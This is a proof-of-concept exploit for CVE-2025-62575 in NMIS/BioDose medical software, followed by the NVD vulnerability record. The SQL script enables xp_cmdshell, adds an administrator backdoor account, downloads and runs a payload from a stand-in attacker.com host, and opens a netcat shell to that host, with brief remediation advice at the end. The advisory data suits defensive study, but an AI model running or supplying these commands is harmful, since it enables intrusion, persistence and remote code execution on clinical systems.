CVE-2025-62575

-- CVE-2025-62575 PoC - SQL Server Privilege Escalation to RCE via sysadmin role -- Target: NMIS/BioDose V22.02 and prior versions -- Author: Security Research (For authorized testing only) -- Step 1: Connect to SQL Server with low-privilege account (nmdbuser or created accounts) -- Example connection string for sqlcmd: -- sqlcmd -S <target_server> -U <username> -P <password> -d <database> -- Step 2: Check current user privileges (should show sysadmin role) SELECT IS_SRVROLEMEMBER('sysadmin'); -- Expected result: 1 (indicating user has sysadmin privileges) -- Step 3: Enable xp_cmdshell if disabled (requires sysadmin) EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Step 4: Execute OS commands via xp_cmdshell -- Example: Create a reverse shell user EXEC xp_cmdshell 'net user attacker P@ssw0rd123 /add'; EXEC xp_cmdshell 'net localgroup Administrators attacker /add'; -- Alternative: Download and execute payload EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://attacker.com/payload.exe -OutFile C:\temp\payload.exe"'; EXEC xp_cmdshell 'C:\temp\payload.exe'; -- Alternative: Bind shell using netcat EXEC xp_cmdshell 'nc.exe -e cmd.exe attacker.com 4444'; -- Step 5: Verify command execution EXEC xp_cmdshell 'whoami'; -- Expected output: nt authority\system (indicates highest privileges) -- Remediation: -- 1. Revoke sysadmin role from nmdbuser and application accounts -- 2. Create a new login with only necessary database privileges -- 3. Disable xp_cmdshell and other potentially dangerous extended stored procedures

{"cve": {"id": "CVE-2025-62575", "sourceIdentifier": "[email protected]", "published": "2025-12-02T21:15:52.133", "lastModified": "2026-01-02T21:03:05.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NMIS/BioDose V22.02 and previous versions rely on a Microsoft SQL Server database. The SQL user account 'nmdbuser' and other created accounts by default have the sysadmin role. This can lead to remote code execution through the use of certain built-in stored procedures."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mirion:biodose\\/nmis:*:*:*:*:*:*:*:*", "versionEndExcluding": "23.0", "matchCriteriaId": "0C792586-2A7A-4497-B711-F56F88E84E34"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}